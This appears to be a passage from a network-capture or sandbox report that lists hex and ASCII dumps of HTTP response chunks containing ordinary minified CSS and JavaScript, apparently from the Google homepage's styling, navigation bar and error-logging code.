                                                                    2021-10-27 14:29:02 UTC12INData Raw: 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 2d 68 76 72 2c 2e 67 62 71 66 62 61 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 61 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d
                                                                    Data Ascii: shadow:none;box-shadow:none}.gbqfb-hvr,.gbqfba-hvr,.gbqfbb-hvr{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1)}.gbqfb::-moz-focus-inner,.gbqfba::-moz-focus-inner,.gbqfbb::-moz-focus-
                                                                    2021-10-27 14:29:02 UTC14INData Raw: 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30
                                                                    Data Ascii: adient(top,#4d90fe,#357ae8);background-image:-o-linear-gradient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0
                                                                    2021-10-27 14:29:02 UTC15INData Raw: 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 38 66 38 66 38 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61
                                                                    Data Ascii: Microsoft.gradient(startColorStr='#f8f8f8',EndColorStr='#f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-ima
                                                                    2021-10-27 14:29:02 UTC16INData Raw: 65 2c 2e 67 62 71 66 62 62 3a 61 63 74 69 76 65 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b
                                                                    Data Ascii: e,.gbqfbb:active{-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;
                                                                    2021-10-27 14:29:02 UTC17INData Raw: 6f 72 2d 73 74 6f 70 28 30 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 2e 35 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30
                                                                    Data Ascii: or-stop(0,rgba(0,0,0,.1)),color-stop(.5,rgba(0,0,0,.8)),color-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0
                                                                    2021-10-27 14:29:02 UTC19INData Raw: 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30
                                                                    Data Ascii: margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 63 62 0d 0a 21 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6e 2b 2b 3b 65 3d 65 7c 7c 7b 7d 3b 62 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3b 76 61 72 20 63 3d 22 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 65 69 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 49 29 3b 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 26 26 28 63 2b 3d 22 26 6a 65 78 70 69 64 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 29 29 3b 63 2b 3d 22 26 73 72 63 70 67 3d 22 2b 62 28 71 2e 73 70 29 2b 22 26 6a 73 72 3d 22 2b 62 28 71 2e 6a 73 72 29 2b 22 26 62 76 65 72 3d 22 2b 62 28 71 2e 62 76 29 2b 28 22 26 6a 73 65 6c 3d 22 2b 64 29 0d 0a
                                                                    Data Ascii: cb!b)return null;n++;e=e||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(q.sp)+"&jsr="+b(q.jsr)+"&bver="+b(q.bv)+("&jsel="+d)
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 37 31 65 66 0d 0a 3b 63 2b 3d 22 26 73 6e 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 73 6e 29 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 63 2b 3d 22 26 22 2c 63 2b 3d 62 28 72 29 2c 63 2b 3d 22 3d 22 2c 63 2b 3d 62 28 65 5b 72 5d 29 3b 63 3d 63 2b 22 26 65 6d 73 67 3d 22 2b 62 28 61 2e 6e 61 6d 65 2b 22 3a 20 22 2b 61 2e 6d 65 73 73 61 67 65 29 3b 63 3d 63 2b 22 26 6a 73 73 74 3d 22 2b 62 28 61 2e 73 74 61 63 6b 7c 7c 22 4e 2f 41 22 29 3b 31 32 32 38 38 3c 3d 63 2e 6c 65 6e 67 74 68 26 26 28 63 3d 63 2e 73 75 62 73 74 72 28 30 2c 31 32 32 38 38 29 29 3b 61 3d 63 3b 6d 7c 7c 67 6f 6f 67 6c 65 2e 6c 6f 67 28 30 2c 22 22 2c 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 65 2c 6d 2c 64
                                                                    Data Ascii: 71ef;c+="&sn="+b(google.sn);for(var r in e)c+="&",c+=b(r),c+="=",c+=b(e[r]);c=c+"&emsg="+b(a.name+": "+a.message);c=c+"&jsst="+b(a.stack||"N/A");12288<=c.length&&(c=c.substr(0,12288));a=c;m||google.log(0,"",a);return a};window.onerror=function(a,b,e,m,d
                                                                    2021-10-27 14:29:02 UTC21INData Raw: 63 74 69 6f 6e 28 29 7b 7d 2c 68 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 65 77 20 49 6d 61 67 65 2c 63 3d 69 61 3b 62 2e 6f 6e 65 72 72 6f 72 3d 62 2e 6f 6e 6c 6f 61 64 3d 62 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 65 6c 65 74 65 20 6a 61 5b 63 5d 7d 63 61 74 63 68 28 64 29 7b 7d 7d 3b 6a 61 5b 63 5d 3d 62 3b 62 2e 73 72 63 3d 61 3b 69 61 3d 63 2b 31 7d 2c 6a 61 3d 5b 5d 2c 69 61 3d 30 3b 70 28 22 6c 6f 67 67 65 72 22 2c 7b 69 6c 3a 68 61 2c 6d 6c 3a 74 2c 6c 6f 67 3a 6b 61 7d 29 3b 76 61 72 20 75 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 3b 76 61 72 20 76 3d 7b 7d 2c 6c 61 3d 7b 7d 2c 77 3d 5b 5d 2c 6d 61 3d 68 2e 62 28 22 30 2e 31 22
                                                                    Data Ascii: ction(){},ha=function(){},ka=function(a){var b=new Image,c=ia;b.onerror=b.onload=b.onabort=function(){try{delete ja[c]}catch(d){}};ja[c]=b;b.src=a;ia=c+1},ja=[],ia=0;p("logger",{il:ha,ml:t,log:ka});var u=window.gbar.logger;var v={},la={},w=[],ma=h.b("0.1"
                                                                    2021-10-27 14:29:02 UTC22INData Raw: 63 57 66 58 51 57 4b 64 54 70 51 2f 6d 3d 5f 5f 66 65 61 74 75 72 65 73 5f 5f 22 29 29 7b 76 61 72 20 46 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 77 61 3f 61 7c 7c 62 3a 62 7d 2c 78 61 3d 68 2e 61 28 22 31 22 29 2c 79 61 3d 68 2e 61 28 22 22 29 2c 7a 61 3d 68 2e 61 28 22 22 29 2c 77 61 3d 68 2e 61 28 22 22 29 2c 41 61 3d 77 69 6e 64 6f 77 2e 67 61 70 69 3d 46 28 77 69 6e 64 6f 77 2e 67 61 70 69 2c 7b 7d 29 2c 42 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 64 67 6c 28 61 2c 62 29 7d 3b 78 61 3f 42 28 63 29 3a 28 41 28 22 67 6c 22 2c 63 29 2c 44 28 22 67 6c 22 29 29 7d 2c 43 61 3d 7b 7d 2c 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 3a 22
                                                                    Data Ascii: cWfXQWKdTpQ/m=__features__")){var F=function(a,b){return wa?a||b:b},xa=h.a("1"),ya=h.a(""),za=h.a(""),wa=h.a(""),Aa=window.gapi=F(window.gapi,{}),Ba=function(a,b){var c=function(){g.dgl(a,b)};xa?B(c):(A("gl",c),D("gl"))},Ca={},Da=function(a){a=a.split(":"
                                                                    2021-10-27 14:29:02 UTC24INData Raw: 67 63 3d 22 2c 64 28 22 47 42 52 22 29 2c 22 26 6f 67 6c 3d 22 2c 64 28 22 65 6e 22 29 5d 3b 62 2e 5f 73 6e 26 26 28 62 2e 5f 73 6e 3d 0a 22 6f 67 2e 22 2b 62 2e 5f 73 6e 29 3b 66 6f 72 28 76 61 72 20 6b 20 69 6e 20 62 29 66 2e 70 75 73 68 28 22 26 22 29 2c 66 2e 70 75 73 68 28 64 28 6b 29 29 2c 66 2e 70 75 73 68 28 22 3d 22 29 2c 66 2e 70 75 73 68 28 64 28 62 5b 6b 5d 29 29 3b 66 2e 70 75 73 68 28 22 26 65 6d 73 67 3d 22 29 3b 66 2e 70 75 73 68 28 64 28 63 2e 6e 61 6d 65 2b 22 3a 22 2b 63 2e 6d 65 73 73 61 67 65 29 29 3b 76 61 72 20 6d 3d 66 2e 6a 6f 69 6e 28 22 22 29 3b 48 61 28 6d 29 26 26 28 6d 3d 6d 2e 73 75 62 73 74 72 28 30 2c 32 45 33 29 29 3b 76 61 72 20 6e 3d 6d 3b 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 2e 5f 61
                                                                    Data Ascii: gc=",d("GBR"),"&ogl=",d("en")];b._sn&&(b._sn="og."+b._sn);for(var k in b)f.push("&"),f.push(d(k)),f.push("="),f.push(d(b[k]));f.push("&emsg=");f.push(d(c.name+":"+c.message));var m=f.join("");Ha(m)&&(m=m.substr(0,2E3));var n=m;var l=window.gbar.logger._a
                                                                    2021-10-27 14:29:02 UTC25INData Raw: 2e 6d 61 74 63 68 28 2f 2e 2a 5c 2f 61 63 63 6f 75 6e 74 73 5c 2f 43 6c 65 61 72 53 49 44 5b 3f 5d 2f 29 26 26 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 50 61 28 29 29 3b 62 26 26 28 61 2e 68 72 65 66 3d 61 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 28 5b 3f 26 5d 63 6f 6e 74 69 6e 75 65 3d 29 5b 5e 26 5d 2a 2f 2c 22 24 31 22 2b 62 29 29 7d 66 75 6e 63 74 69 6f 6e 20 53 61 28 61 29 7b 77 69 6e 64 6f 77 2e 67 41 70 70 6c 69 63 61 74 69 6f 6e 26 26 28 61 2e 68 72 65 66 3d 77 69 6e 64 6f 77 2e 67 41 70 70 6c 69 63 61 74 69 6f 6e 2e 67 65 74 54 61 62 55 72 6c 28 61 2e 68 72 65 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 54 61 28 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 28 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 71 7c 7c 22 22 29 2e 76
                                                                    Data Ascii: .match(/.*\/accounts\/ClearSID[?]/)&&encodeURIComponent(Pa());b&&(a.href=a.href.replace(/([?&]continue=)[^&]*/,"$1"+b))}function Sa(a){window.gApplication&&(a.href=window.gApplication.getTabUrl(a.href))}function Ta(a){try{var b=(document.forms[0].q||"").v
                                                                    2021-10-27 14:29:02 UTC26INData Raw: 64 65 66 61 75 6c 74 56 69 65 77 3b 63 26 26 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3f 28 61 3d 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 61 2c 22 22 29 29 26 26 28 62 3d 61 2e 64 69 72 65 63 74 69 6f 6e 29 3a 62 3d 61 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3f 0a 61 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 2e 64 69 72 65 63 74 69 6f 6e 3a 61 2e 73 74 79 6c 65 2e 64 69 72 65 63 74 69 6f 6e 3b 72 65 74 75 72 6e 22 72 74 6c 22 3d 3d 62 7d 2c 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 29 74 72 79 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 64 35 22 29 3b 69 66 28 64 29 7b 76 61 72 20 66 3d 64 2e 66 69 72 73 74 43 68 69 6c 64 2c 6b 3d 66 2e 66 69 72
                                                                    Data Ascii: defaultView;c&&c.getComputedStyle?(a=c.getComputedStyle(a,""))&&(b=a.direction):b=a.currentStyle?a.currentStyle.direction:a.style.direction;return"rtl"==b},fb=function(a,b,c){if(a)try{var d=document.getElementById("gbd5");if(d){var f=d.firstChild,k=f.fir
                                                                    2021-10-27 14:29:02 UTC27INData Raw: 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 61 61 26 26 67 2e 70 61 61 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7d 29 7d 2c 6c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4c 5b 61 5d 7c 7c 28 4c 5b 61 5d 3d 5b 5d 29 3b 4c 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4d 5b 61 5d 7c 7c 28 4d 5b 61 5d 3d 5b 5d 29 3b 4d 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6e 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 58 61 5b 61 5d 3d 62 7d 2c 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4e 5b 61 5d 7c 7c 28 4e 5b 61 5d 3d 5b 5d 29 3b 4e 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 61 62 3d 66 75
                                                                    Data Ascii: kb=function(a,b,c,d,f,k,m,n,l,q){B(function(){g.paa&&g.paa(a,b,c,d,f,k,m,n,l,q)})},lb=function(a,b){L[a]||(L[a]=[]);L[a].push(b)},mb=function(a,b){M[a]||(M[a]=[]);M[a].push(b)},nb=function(a,b){Xa[a]=b},ob=function(a,b){N[a]||(N[a]=[]);N[a].push(b)},ab=fu
                                                                    2021-10-27 14:29:02 UTC29INData Raw: 4f 7d 3b 70 28 22 73 6f 22 2c 56 61 29 3b 70 28 22 73 6f 73 22 2c 55 61 29 3b 70 28 22 73 69 22 2c 57 61 29 3b 70 28 22 74 67 22 2c 62 62 29 3b 0a 70 28 22 63 6c 6f 73 65 22 2c 63 62 29 3b 70 28 22 72 64 64 22 2c 64 62 29 3b 70 28 22 61 64 64 4c 69 6e 6b 22 2c 67 62 29 3b 70 28 22 61 64 64 45 78 74 72 61 4c 69 6e 6b 22 2c 68 62 29 3b 70 28 22 70 63 6d 22 2c 69 62 29 3b 70 28 22 70 63 61 22 2c 6a 62 29 3b 70 28 22 70 61 61 22 2c 6b 62 29 3b 70 28 22 64 64 6c 64 22 2c 24 61 29 3b 70 28 22 64 64 72 64 22 2c 73 62 29 3b 70 28 22 64 64 65 72 72 22 2c 72 62 29 3b 70 28 22 72 74 6c 22 2c 59 61 29 3b 70 28 22 6f 70 22 2c 76 62 29 3b 70 28 22 62 68 22 2c 4c 29 3b 70 28 22 61 62 68 22 2c 6c 62 29 3b 70 28 22 64 68 22 2c 4d 29 3b 70 28 22 61 64 68 22 2c 6d 62 29 3b
                                                                    Data Ascii: O};p("so",Va);p("sos",Ua);p("si",Wa);p("tg",bb);p("close",cb);p("rdd",db);p("addLink",gb);p("addExtraLink",hb);p("pcm",ib);p("pca",jb);p("paa",kb);p("ddld",$a);p("ddrd",sb);p("dderr",rb);p("rtl",Ya);p("op",vb);p("bh",L);p("abh",lb);p("dh",M);p("adh",mb);
                                                                    2021-10-27 14:29:02 UTC30INData Raw: 2c 62 29 7d 2c 48 62 3d 7b 73 69 67 6e 65 64 3a 45 62 2c 65 6c 6f 67 3a 47 62 2c 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 75 73 6f 6e 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 2f 30 22 2c 6c 6f 61 64 54 69 6d 65 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 76 2e 70 77 3d 48 62 3b 76 61 72 20 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 3b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6d 3d 61 72 67 75 6d 65 6e 74 73 3b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 67 2c 6c 3d 30 2c 71 3d 63 2e 6c 65 6e 67 74 68 2d 31 3b 6c 3c 71 3b 2b 2b 6c 29 6e 3d 6e 5b 63 5b 6c 5d 5d 3b 6e 5b 63 5b 6c 5d 5d 2e 61 70 70 6c 79 28 6e 2c 6d 29 7d 29 7d 3b
                                                                    Data Ascii: ,b)},Hb={signed:Eb,elog:Gb,base:"https://plusone.google.com/u/0",loadTime:(new Date).getTime()};v.pw=Hb;var Ib=function(a,b){var c=b.split(".");b=function(){var m=arguments;a(function(){for(var n=g,l=0,q=c.length-1;l<q;++l)n=n[c[l]];n[c[l]].apply(n,m)})};
                                                                    2021-10-27 14:29:02 UTC31INData Raw: 65 6e 67 74 68 26 26 66 2e 70 75 73 68 28 22 2c 22 29 2c 66 2e 70 75 73 68 28 51 62 28 7a 29 29 2c 66 2e 70 75 73 68 28 22 2e 22 29 2c 66 2e 70 75 73 68 28 51 62 28 62 5b 7a 5d 29 29 3b 76 61 72 20 7a 3d 66 2e 6a 6f 69 6e 28 22 22 29 3b 22 22 21 3d 7a 26 26 28 61 2e 70 75 73 68 28 22 26 6f 67 61 64 3d 22 29 2c 61 2e 70 75 73 68 28 64 28 7a 29 29 29 7d 6b 61 28 61 2e 6a 6f 69 6e 28 22 22 29 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 62 28 61 29 7b 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 61 2b 3d 22 22 29 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 3f 61 2e 72 65 70 6c 61 63 65 28 22 2e 22 2c 22 25 32 45 22 29 2e 72 65 70 6c 61 63 65 28 22 2c 22 2c 22 25 32 43 22 29 3a 61 7d 68 61 3d 50 62 3b 70 28 22 69
                                                                    Data Ascii: ength&&f.push(","),f.push(Qb(z)),f.push("."),f.push(Qb(b[z]));var z=f.join("");""!=z&&(a.push("&ogad="),a.push(d(z)))}ka(a.join(""))}}function Qb(a){"number"==typeof a&&(a+="");return"string"==typeof a?a.replace(".","%2E").replace(",","%2C"):a}ha=Pb;p("i
                                                                    2021-10-27 14:29:02 UTC33INData Raw: 30 3e 63 3f 4d 61 74 68 2e 6d 61 78 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 63 29 3a 63 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 63 20 69 6e 20 61 26 26 61 5b 63 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 20 63 3b 72 65 74 75 72 6e 2d 31 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 2d 31 3d 3d 63 63 28 61 2c 58 29 3f 28 72 28 45 72 72 6f 72 28 58 2b 22 5f 22 2b 62 29 2c 22 75 70 22 2c 22 63 61 61 22 29 2c 21 31 29 3a 21 30 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 59 28 5b 31 2c 32 5d 2c 22 72 22 29 26 26 28 53 5b 61 5d 3d 53 5b 61 5d 7c 7c 5b 5d 2c 53 5b 61 5d 2e 70 75 73 68 28 62 29 2c 32 3d 3d 58 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 28 64 63 28 61
                                                                    Data Ascii: 0>c?Math.max(0,a.length+c):c;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1},Y=function(a,b){return-1==cc(a,X)?(r(Error(X+"_"+b),"up","caa"),!1):!0},ec=function(a,b){Y([1,2],"r")&&(S[a]=S[a]||[],S[a].push(b),2==X&&window.setTimeout(function(){b(dc(a
                                                                    2021-10-27 14:29:02 UTC34INData Raw: 66 28 6a 63 28 29 29 72 65 74 75 72 6e 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 62 29 3b 69 66 28 6b 63 28 61 29 29 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 28 61 2e 69 64 29 2c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 29 7d 63 61 74 63 68 28 64 29 7b 64 2e 63 6f 64 65 21 3d 44 4f 4d 45 78 63 65 70 74 69 6f 6e 2e 51 55 4f 54 41 5f 45 58 43 45 45 44 45 44 5f 45 52 52 26 26 72 28 64 2c 22 75 70 22 2c 22 67 70 64 22 29 7d 72 65 74 75 72 6e 22 22 7d 2c 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 61 74 74 61 63 68 45 76 65 6e
                                                                    Data Ascii: f(jc())return e.localStorage.getItem(b);if(kc(a))return a.load(a.id),a.getAttribute(b)}catch(d){d.code!=DOMException.QUOTA_EXCEEDED_ERR&&r(d,"up","gpd")}return""},nc=function(a,b,c){a.addEventListener?a.addEventListener(b,c,!1):a.attachEvent&&a.attachEven
